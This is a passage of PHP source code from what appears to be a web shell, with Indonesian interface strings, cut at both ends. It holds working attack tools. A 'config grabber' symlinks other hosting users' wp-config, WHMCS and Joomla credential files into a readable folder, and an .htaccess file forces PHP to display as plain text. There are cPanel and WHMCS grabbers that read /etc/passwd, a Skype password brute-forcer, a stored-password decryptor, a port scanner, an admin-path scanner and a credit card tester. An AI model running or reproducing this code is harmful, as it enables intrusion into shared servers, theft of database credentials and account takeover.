  5564. if(!is_array(mysql_fetch_array($query))){
  5565. echo"<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  5566. }
  5567. while($v=mysql_fetch_array($query)){
  5568. echo "<tr><td align='center'>{$v['domainstatus']}</td>
  5569. <td align='center'>{$v['domain']}</td>
  5570. <td align='center'>{$v['username']}</td>
  5571. <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
  5572. <td align='center'>{$v['assignedips']}</td></tr>\n";
  5573. }
  5574. echo "</table>";
  5575. }else{
  5576. echo'<center><br /><span class="b7">'.mysql_error().'</span><br /></center>';
  5577. }
  5578. }
  5579. }elseif(isset($_GET['x'])&&($_GET['x']=='pscan')){
  5580. echo'<form action="?dm='.$pwd.'&amp;x=pscan" method="post">
  5581. <center><br/><br/><b><span class="b7">O=:[ PORT SCANNER ]:=O</span></b><br/><br/>';
  5582. $start=strip_tags($_POST['start']);
  5583. $end=strip_tags($_POST['end']);
  5584. $host=strip_tags($_POST['host']);
  5585. if(isset($_POST['host'])&&is_numeric($_POST['end'])&&is_numeric($_POST['start'])) {
  5586. for($i=$start; $i<=$end; $i++) {
  5587. $fp=@fsockopen($host,$i,$errno,$errstr, 3);
  5588. if($fp) {
  5589. echo "Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font><br>";
  5590. }
  5591. flush();
  5592. }
  5593. }else{
  5594. echo '<input type="hidden" name="y" value="phptools">
  5595. Host <br/>
  5596. <input type="text" class="inputz" name="host" value="localhost"/><br />
  5597. Port Start<br />
  5598. <input type="text" class="inputz" name="start" value="0"/><br />
  5599. Port End:<br />
  5600. <input type="text" class="inputz" name="end" value="5000"/><br />
  5601. <input type="submit" class="inputzbut" value="Scan Ports" />
  5602. </form></center>';
  5603. }
  5604. }elseif(isset($_GET['x'])&&($_GET['x']=='string')){
  5605. echo'<form action="?dm='.$pwd.'&amp;x=string" method="post">
  5606. <br><br>
  5607. <table class="tabnet"><tbody>
  5608. <tr><th colspan="2"> String to Hash </th></tr>
  5609. <tr><td>String:</td>';
  5610. ?>
  5611. <td><input type='text' class='inputz' name='hash_input' value='<?php if(isset($_POST['hash_input'])){echo $_POST['hash_input'];}?>' /></td></tr>
  5612. <tr>
  5613. <td align="center" colspan="2"><input type='submit' name='submit_hash' style="width:100%;" class='inputzbut' value='Encode' /></td>
  5614. </tr>
  5615. </tbody>
  5616. </table>
  5617. </form>
  5618. <br><br>
  5619. <?php
  5620. if(isset($_POST['submit_hash'])) {
  5621. if(isset($_POST['hash_input'])) {
  5622. $hash_input=$_POST['hash_input'];
  5623. }
  5624. if($hash_input=="") {
  5625. echo 'Nothing Inserted!';
  5626. }else{
  5627. if(isset($hash_input)) {
  5628. echo "<table class='tabnet'><tbody>
  5629. <tr><th colspan='2'> Hash </th></tr>";
  5630. foreach(hash_algos() as $hash_setoption) {
  5631. $calculate_hash=hash($hash_setoption,$hash_input, false);
  5632. echo "<tr><td width='70' align='center'><font style='color:#9F7CEB'>$hash_setoption</font></td><td><font style='color:#5BC740'>$calculate_hash</font></td></tr>";
  5633. }
  5634. echo "</tbody></table>";
  5635. }
  5636. }
  5637. }
  5638. }elseif(isset($_GET['x'])&&($_GET['x']=='cc')){
  5639. echo'<form action="?dm='.$pwd.'&amp;x=cc" method="post">';
  5640. $CCV= new CreditCardValidator();
  5641. if(isset($_POST['cardnum'])){
  5642. $CCV->Validate($_POST['cardnum']);
  5643. $CARDINFO=$CCV->GetCardInfo();
  5644. }
  5645. ?>
  5646. <span class="b7">Credit Card Tester</span><br>
  5647. <form action="" method="post">
  5648. <fieldset id="fs-input">
  5649. <legend></legend>
  5650. <label>Card Number</label>
  5651. <input type="text" style="color:#FF0000;background-color:#000000" name="cardnum" value="<?php echo @$_POST['cardnum']; ?>"><br>
  5652. <label>Show Geeky Output</label>
  5653. <input type="checkbox" name="showgeek" class="cb" value="1"<?php if(isset($_POST['showgeek']))echo ' checked'; ?>>
  5654. </fieldset>
  5655. <fieldset id="fs-submit">
  5656. <legend></legend>
  5657. <label></label>
  5658. <input type="submit" value="Check CC">
  5659. </fieldset>
  5660. <?php if(isset($_POST['cardnum'])){ ?>
  5661. <br>
  5662. <span class="b7">Result</span><br><fieldset id="fs-result">
  5663. <legend></legend><label></label>
  5664. <strong>Status:</strong> <?php echo strtoupper($CARDINFO['status']);?><br>
  5665. <strong>Card Type: </strong> <?php echo $CCV->GetCardName($CARDINFO['type']);?>
  5666. </fieldset>
  5667. <?php
  5668. }
  5669. if(isset($_POST['showgeek'])){
  5670. echo'<fieldset id="fs-geek-result">
  5671. <legend></legend>
  5672. <label>Geeky Result</label>
  5673. <textarea rows="40" cols="80">';
  5674. print_r($CCV);
  5675. echo'</textarea></fieldset>';
  5676. }
  5677. echo'</form>';
  5678. }elseif(isset($_GET['x'])&&($_GET['x']=='unzip')){
  5679. echo'<form action="?dm='.$pwd.'&amp;x=unzip" method="post">
  5680. <center><br/><br/><span class="b7">O=:[ ZIP FILE EXTRACTOR ]:=O</span><br /><br /> </center>';
  5681. $handler=opendir('.');
  5682. echo"<center><b>Pilih File Yg Mau Di Extrak </b><br />";
  5683. echo'<form action="" method="post">';
  5684. $found=false;
  5685. while($file=readdir($handler)){
  5686. if(preg_match("/.zip$/i",$file)){
  5687. echo'<input type="checkbox" name="zf" value="'.$file.'">'.$file.'<br />';
  5688. $found=true;
  5689. }
  5690. }
  5691. closedir($handler);
  5692.  
  5693. if($found==false){
  5694. echo "<b>[+] GA ADA FILE EXTENSI ZIP [+]</b><br>";
  5695. }else{
  5696. echo '<br/ ><input class="inputz" type="text" name="dirun" value="'.$pwd.'" size="50px">';
  5697. echo '<input class="inputz" type="submit" name="un" value=" Unzip File "><br />';
  5698. if(isset($_POST['un'])&&!empty($_POST['zf'])){
  5699. echo "<b>[+] PROSES BONGKAR [+]</b><br>";
  5700. $dirun=(!empty($_POST['dirun'])?$_POST['dirun']:$pwd);
  5701. $fzp=$_POST['zf'];
  5702. if(class_exists('ZipArchive')){
  5703. $zip=new ZipArchive;
  5704. $res=$zip->open($fzp);
  5705. if($res===true){
  5706. for($i=0;$i<$zip->numFiles;$i++){
  5707. $rpl=$zip->getNameIndex($i);
  5708. echo 'Name: '.(!empty($rpl)?$rpl:'').'<br />';
  5709. }
  5710. $zip->extractTo($dirun);
  5711. $zip->close();
  5712. echo "ZipArchive<br />Sukses extrak ".$fzp."<br/>";
  5713. }else{
  5714. echo "Sukses extrak ".$fzp."<br/>";
  5715. echo exe('unzip -o '.$fzp.' -d '.$dirun);
  5716. echo "<br/>";
  5717. }
  5718. }else{
  5719. echo "Sukses extrak ".$fzp."<br/>";
  5720. echo exe('unzip -o '.$fzp.' -d '.$dirun);
  5721. echo "<br/>";
  5722. }
  5723. }
  5724. }
  5725. echo "</form>";
  5726. }elseif(isset($_GET['x'])&&($_GET['x']=='analyzer')){
  5727. echo'<form action="?dm='.$pwd.'&amp;x=analyzer" method="post">
  5728. <center><br/><span class="b7">O=:[ HASH TYPE ANALYZER ]:=O<br/><br/><form method=POST>
  5729. <input type="text" name="hashToAnalyze" size=60><input type="submit" value="Check Hash Now" name="analyzieNow"></form></center>';
  5730. if($_POST['analyzieNow']) {
  5731. $hash=$_POST['hashToAnalyze'];
  5732. $subHash=substr($hash, 0, 3);
  5733. if($subHash=='$ap'&&strlen($hash)==37) {
  5734. echo "<center>The Hash:".$hash." is:MD5(APR) Hash";
  5735. }elseif($subHash=='$1$'&&strlen($hash)==34) {
  5736. echo "<center>The Hash:".$hash." is:MD5(UNIX) Hash";
  5737. }elseif($subHash=='$H$'&&strlen($hash)==35) {
  5738. echo "<center>The Hash:".$hash." is:MD5(phpBB3) Hash";
  5739. }elseif(strlen($hash)==29) {
  5740. echo "<center>The Hash:".$hash." is:MD5(Wordpress) Hash";
  5741. }elseif($subHash=='$5$'&&strlen($hash)==64) {
  5742. echo "<center>The Hash:".$hash." is:SHA256(UNIX) Hash";
  5743. }elseif($subHash=='$6$'&&strlen($hash)==128) {
  5744. echo "<center>The Hash:".$hash." is:SHA512(UNIX) Hash";
  5745. }elseif(strlen($hash)==56) {
  5746. echo "<center>The Hash:".$hash." is:SHA224 Hash";
  5747. }elseif(strlen($hash)==64) {
  5748. echo "<center>The Hash:".$hash." is:SHA256 Hash";
  5749. }elseif(strlen($hash)==96) {
  5750. echo "<center>The Hash:".$hash." is:SHA384 Hash";
  5751. }elseif(strlen($hash)==128) {
  5752. echo "<center>The Hash:".$hash." is:SHA512 Hash";
  5753. }elseif(strlen($hash)==40) {
  5754. echo "<center>The Hash:".$hash." is:MySQL v5.x Hash";
  5755. }elseif(strlen($hash)==16) {
  5756. echo "<center>The Hash:".$hash." is:MySQL Hash";
  5757. }elseif(strlen($hash)==13) {
  5758. echo "<center>The Hash:".$hash." is:DES(Unix) Hash";
  5759. }elseif(strlen($hash)==32) {
  5760. echo "<center>The Hash:".$hash." is:MD5 Hash";
  5761. }elseif(strlen($hash)==4) {
  5762. echo "<center>The Hash:".$hash." is:[CRC-16]-[CRC-16-CCITT]-[FCS-16]";
  5763. }else{
  5764. echo "<center>Error:Can't Detect Hash Type";
  5765. }
  5766. echo '</center>';
  5767. }
  5768. }elseif(isset($_GET['x'])&&($_GET['x']=='skype')){?>
  5769. <form action="?dm=<?php echo $pwd; ?>&amp;x=skype" method="post">
  5770. <br/><br/><form method='POST'>
  5771. <center><br/><br/>
  5772. <img src='http://www.in-travel.info/easter2013/wp-content/uploads/2012/12/Skype-Logo-300x133.png'><br/><br/><span class='b7'>O=:[ BRUTEFORCE SKYPE ACCOUNT ]:=O</span><br/><br/>
  5773. Username:<input style='color:lime;background-color:#000000' type='text' name='skypename' placeholder='Skype Name' size='38'><br>
  5774. <textarea style='color:lime;background-color:#000000' rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br><br>
  5775. <input style='color:lime;background-color:#000000' type='submit' value='Start BruteForce' name='brute'><br>
  5776. </center>
  5777. </form>
  5778. <?php
  5779. $skype="https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin";
  5780. $username=$_POST['skypename'];
  5781. $password=explode("\r\n",$_POST['passwords']);
  5782. $time=date_default_timezone_set("Asia/Jakarta");
  5783. $date=date('H:i:s');
  5784. $header="HTTP/1.1 302";
  5785. if($_POST['brute']){
  5786. foreach($password as $pass){
  5787. bruteskype($skype,$username,$pass,$header);
  5788. }
  5789. }
  5790. }elseif(isset($_GET['x'])&&($_GET['x']=='grabber')){
  5791. echo'<form action="?dm='.$pwd.'&amp;x=grabber" method="post">
  5792. <center><br/><br/><span class="b7">O=:[ CONFIG GRABBER ]:=O<br/><br/>
  5793. <textarea name="passwd"></textarea><br/><br/>
  5794. <input name="cat" type="submit"><br/></form>';
  5795. if($_POST['cat']&&!$_POST['passwd']=="") {
  5796. echo 'Checking Functions ...<br>';
  5797. $functions=ini_get('disable_functions');
  5798. if(preg_match('/symlink/',$functions)) {
  5799. echo 'Functions Symlink On<br>';
  5800. }
  5801. mkdir("dm_grab",0755);
  5802. chdir("dm_grab");
  5803. $htaccess="Options all\nOptions +Indexes\nOptions +FollowSymLinks\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any";
  5804. simpan(".htaccess",$htaccess);
  5805. $passwd=$_POST["passwd"];
  5806. $passwd=explode("\n",$passwd);
  5807. echo "Start Symlinking ...<br>";
  5808. foreach($passwd as $pwd) {
  5809. $pawd=explode(":",$pwd);
  5810. $user=$pawd[0];
  5811. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-shop.txt');
  5812. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-shop-os.txt');
  5813. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-oscom.txt');
  5814. @symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$user.'-oscommerce.txt');
  5815. @symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$user.'-oscommerces.txt');
  5816. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-shop2.txt');
  5817. @symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$user.'-shop-shopping.txt');
  5818. @symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$user.'-sale.txt');
  5819. @symlink('/home/'.$user.'/public_html/amember/config.inc.php',$user.'-amember.txt');
  5820. @symlink('/home/'.$user.'/public_html/config.inc.php',$user.'-amember2.txt');
  5821. @symlink('/home/'.$user.'/public_html/members/configuration.php',$user.'-members.txt');
  5822. @symlink('/home/'.$user.'/public_html/config.php',$user.'-4images1.txt');
  5823. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-forum.txt');
  5824. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-forums.txt');
  5825. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
  5826. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
  5827. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-WordPress.txt');
  5828. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-WordPress-wp.txt');
  5829. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-WordPress-WP.txt');
  5830. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-WordPress-wp-beta.txt');
  5831. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-WordPress-beta.txt');
  5832. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-WordPress-press.txt');
  5833. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-WordPress-wordpress.txt');
  5834. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-WordPress-Wordpress.txt');
  5835. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-WordPress-Wordpress.txt');
  5836. @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'-WordPress-wordpress-beta.txt');
  5837. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-WordPress-news.txt');
  5838. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-WordPress-new.txt');
  5839. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
  5840. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
  5841. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
  5842. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
  5843. @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'-wp-protal.txt');
  5844. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
  5845. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
  5846. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-wp-test.txt');
  5847. @symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$user.'-ibproarcade.txt');
  5848. @symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$user.'-ibproarcade.txt');
  5849. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
  5850. @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'-joomla-protal.txt');
  5851. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
  5852. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
  5853. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
  5854. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
  5855. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
  5856. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
  5857. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
  5858. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
  5859. @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'-vb3-config.txt');
  5860. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vb1-config.txt');
  5861. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-includes-vb.txt');
  5862. @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'-vbluttin-class_core.php.txt');
  5863. @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'-vbluttin-class_core.php1.txt');
  5864. @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'-vbluttin-class_core.php2.txt');
  5865. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
  5866. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
  5867. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
  5868. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
  5869. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
  5870. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
  5871. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
  5872. @symlink('/home/'.$user.'/public_html/supp/configuration.php',$user.'-supp.txt');
  5873. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-sucure.txt');
  5874. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-sucure-whm.txt');
  5875. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-sucure-whmcs.txt');
  5876. @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'-cpanel.txt');
  5877. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-panel.txt');
  5878. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-host.txt');
  5879. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-hosting.txt');
  5880. @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'-hosts.txt');
  5881. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
  5882. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
  5883. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-clients.txt');
  5884. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-client.txt');
  5885. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-clientes.txt');
  5886. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-client.txt');
  5887. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-clientsupport.txt');
  5888. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-billing.txt');
  5889. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-whm-manage.txt');
  5890. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-whm-my.txt');
  5891. @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'-whm-myshop.txt');
  5892. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-zencart.txt');
  5893. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-shop-zencart.txt');
  5894. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-shop-ZCshop.txt');
  5895. @symlink('/home/'.$user.'/public_html/Settings.php',$user.'-smf.txt');
  5896. @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'-smf2.txt');
  5897. @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'-smf-forum.txt');
  5898. @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'-smf-forums.txt');
  5899. @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'-up.txt');
  5900. @symlink('/home/'.$user.'/public_html/article/config.php',$user.'-Nwahy.txt');
  5901. @symlink('/home/'.$user.'/public_html/up/includes/config.php',$user.'-up2.txt');
  5902. @symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-6.txt');
  5903. @symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
  5904. @symlink('/home/'.$user.'/public_html/connect.php',$user.'-PHP-Fusion.txt');
  5905. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-9.txt');
  5906. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-traidnt1.txt');
  5907. @symlink('/home/'.$user.'/public_html/config.php',$user.'-4images.txt');
  5908. @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'-Drupal.txt');
  5909. @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'-1member.txt');
  5910. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-billings.txt');
  5911. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');
  5912. @symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.'-supports.txt');
  5913. @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'-AM4SS-hosting.txt');
  5914. @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'-hostbills-supports.txt');
  5915. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-hostbills-client.txt');
  5916. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-hostbills-support.txt');
  5917. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-hostbills-billing.txt');
  5918. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-hostbills-billings.txt');
  5919. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-hostbills-host.txt');
  5920. @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'-hostbills-hosts.txt');
  5921. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-hostbills-hosting.txt');
  5922. @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'-hostbills-hostings.txt');
  5923. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-hostbills.txt');
  5924. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-hostbills-hostbills.txt');
  5925. @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'-hostbills-hostbill.txt');
  5926. }
  5927. echo "<center><br/><br/><a href='dm_grab'><span class='b9'>CHECK CONFIG GRABBER</span><br/></a><br/><br/></center>";
  5928. }
  5929.  
  5930. }elseif(isset($_GET['x'])&&($_GET['x']=='ascan')){?>
  5931. <form action="?dn=<?php echo $pwd; ?>&amp;x=ascan" method="post">
  5932. <center><br/><br/><span class="b7">O=:[ ADMIN LOGIN PATH SCANNER ]:=O<br/><br/> <form method="POST"> Website:<input name="target" style="color:lime;background-color:#000000" size="25" value="http://"><input type="submit" style="color:lime;background-color:#000000" value=" >> "></form></center>
  5933. <?php
  5934. $target=$_POST['target'];
  5935. $admins=array('/admin','/adminweb','/safeadmin','/adminweb','/controlpanel','/cpanel','/admcp','/admin.asp','/sysadmin.php','/useradmin','/wp-admin','/webadmin','/SysAdmin','/administer','/administrator','/adm','/directadmin','/staradmin','/panel','/wp-login','/pureadmin','/webmaster','/ADMIN','/login','/paneldecontrol','/administrador','/admin.php','/login','/loign.php','/administrator.php','/admins.php','/logins','/admincp','/admincp.php');
  5936. foreach($admins as $admin) {
  5937. $jamban=($target) . ($admin);
  5938. $get=file_get_contents($jamban);
  5939. if($get) {
  5940. echo "<br>[+] FOUND:<a href='".$jamban."' target='_blank'>".$jamban."</a> [+]<br>";
  5941. }
  5942. }
  5943. }elseif(isset($_GET['x'])&&($_GET['x']=='logout')){
  5944. if(isset($_SERVER['HTTP_COOKIE'])){
  5945. $cookies=explode(';',$_SERVER['HTTP_COOKIE']);
  5946. foreach($cookies as $cookie){
  5947. $parts=explode('=',$cookie);
  5948. $name=trim($parts[0]);
  5949. setcookie($name,'',time()-1000);
  5950. }
  5951. }else{
  5952. foreach($_COOKIE as $delc=>$value){
  5953. setcookie($delc,'',time()-1000);
  5954. }
  5955. }
  5956. echo'<center><h1> Please Wait ...</h1></center><script>window.location.href ="'.lokasi.'"</script>';
  5957. }elseif(isset($_GET['x'])&&($_GET['x']=='jomass')){
  5958.  
  5959. }elseif(isset($_GET['x'])&&($_GET['x']=='reseller')){
  5960. echo'<form action="?dm='.$pwd.'&amp;x=reseller" method="post">';
  5961. echo '<br><br><body bgcolor=black><center>
  5962. <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
  5963. <b><span class="b7">O=:[ CPANEL GRABBER ]:=O</span><br/><br/>
  5964. <center>
  5965. <textarea name="passwd" rows="20">';
  5966. $uSr=file("/etc/passwd");
  5967. foreach($uSr as $usrr){
  5968. $str=explode(":",$usrr);
  5969. echo $str[0]."\n";
  5970. }
  5971. ?></textarea><p>
  5972. <font style="color:lime">
  5973. [~] Home:
  5974. <select title="Select Target Home" name="home">
  5975. <option title="home" value="home">home</option>
  5976. <option title="home2" value="home2">home2</option>
  5977. <option title="home3" value="home3">home3</option>
  5978. <option title="home4" value="home4">home4</option>
  5979. <option title="home5" value="home5">home5</option>
  5980. <option title="home6" value="home6">home6</option>
  5981. <option title="home7" value="home7">home7</option>
  5982. <option title="home8" value="home8">home8</option>
  5983. <option title="home9" value="home9">home9</option>
  5984. <option title="home10" value="home10">home10</option>
  5985. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess:
  5986. <select title="Select Software" name="soft">
  5987. <option title="Apache" value="Options all
  5988. Options +Indexes
  5989. Options +FollowSymLinks
  5990. DirectoryIndex Sux.html
  5991. AddType text/plain .php
  5992. AddHandler server-parsed .php
  5993. AddType text/plain .html
  5994. AddHandler txt .html
  5995. Require None
  5996. Satisfy Any">Apache</option>
  5997. <option title="Litespeed" value="
  5998. Options +FollowSymLinks
  5999. DirectoryIndex seees.html
  6000. RemoveHandler .php
  6001. AddType application/octet-stream .php ">Litespeed</option>
  6002. </select> &nbsp;&nbsp; <input name="anu" size="10" value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
  6003. <br/><br/></form></center>
  6004. <?php
  6005. @ini_set('html_errors', 0);
  6006. @ini_set('max_execution_time', 0);
  6007. @ini_set('display_errors', 0);
  6008. @ini_set('file_uploads', 1);
  6009. if($_POST['anu']) {
  6010. $path=$_POST['path'];
  6011. $home=$_POST['home'];
  6012. $functions=@ini_get("disable_functions");
  6013. if(preg_match("symlink",$functions)) {
  6014. die('Kurang Ganteng Cok');
  6015. }
  6016. @mkdir(RESELLER, 0755);
  6017. @chdir(RESELLER);
  6018. $htaccess=$_POST['soft'];
  6019. file_put_contents(".htaccess",$htaccess, FILE_APPEND);
  6020. $passwd=explode("\n",$_POST["passwd"]);
  6021. foreach($passwd as $pwd) {
  6022. $user=trim($pwd);
  6023. @symlink('/'.$home.'/'.$user.'/public_html/moving.page/index.html',$user.' <~ RESELLER1');
  6024. @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER2');
  6025. }
  6026. echo '<center>
  6027. <font face="Audiowide" size="5" style="color:lime;background-color:#000000">
  6028. <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
  6029. Scanning Complete....<br/>
  6030. Now Checking Folder Result....<br/><br/><br/>
  6031. <a href="/RESELLER">O=[ GO TO HELL ]=O</a>
  6032. </font>
  6033. <br/><br/><br/></center> </body></html> ';
  6034. }
  6035. }elseif(isset($_GET['x'])&&($_GET['x']=='dmwhmcs11')){?>
  6036. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs11" method="post">
  6037. <?php
  6038. echo '<br><br><body bgcolor=black><center>
  6039. <img src="http://www.whmcs.com/images/logo_whmcs.png"><br/><br/>
  6040. <span class="b7">O=:[ SCAN CMS WHMCS ]:=O</span><br/><br/>
  6041. <center>
  6042. <textarea name="passwd">';
  6043. $uSr=file("/etc/passwd");
  6044. foreach($uSr as $usrr){
  6045. $str=explode(":",$usrr);
  6046. echo $str[0]."\n";
  6047. }
  6048. ?></textarea><p>
  6049. <font style="color:lime;">
  6050. [~] Home:
  6051. <select title="Select Target Home" name="home">
  6052. <option title="home" value="home">home</option>
  6053. <option title="home2" value="home2">home2</option>
  6054. <option title="home3" value="home3">home3</option>
  6055. <option title="home4" value="home4">home4</option>
  6056. <option title="home5" value="home5">home5</option>
  6057. <option title="home6" value="home6">home6</option>
  6058. <option title="home7" value="home7">home7</option>
  6059. <option title="home8" value="home8">home8</option>
  6060. <option title="home9" value="home9">home9</option>
  6061. <option title="home10" value="home10">home10</option>
  6062. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess:
  6063. <select title="Select Software" name="soft">
  6064. <option title="Apache" value="Options all
  6065. Options +Indexes
  6066. Options +FollowSymLinks
  6067. DirectoryIndex Sux.html
  6068. AddType text/plain .php
  6069. AddHandler server-parsed .php
  6070. AddType text/plain .html
  6071. AddHandler txt .html
  6072. Require None
  6073. Satisfy Any">Apache</option>
  6074. <option title="Litespeed" value="
  6075. Options +FollowSymLinks
  6076. DirectoryIndex seees.html
  6077. RemoveHandler .php
  6078. AddType application/octet-stream .php ">Litespeed</option>
  6079. </select> &nbsp;&nbsp; <input name="anu" value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
  6080. <br/><br/></form></center>
  6081. <?php
  6082. if($_POST['anu']) {
  6083. $path=$_POST['path'];
  6084. $home=$_POST['home'];
  6085. $functions=@ini_get("disable_functions");
  6086. if(preg_match("symlink",$functions)) {
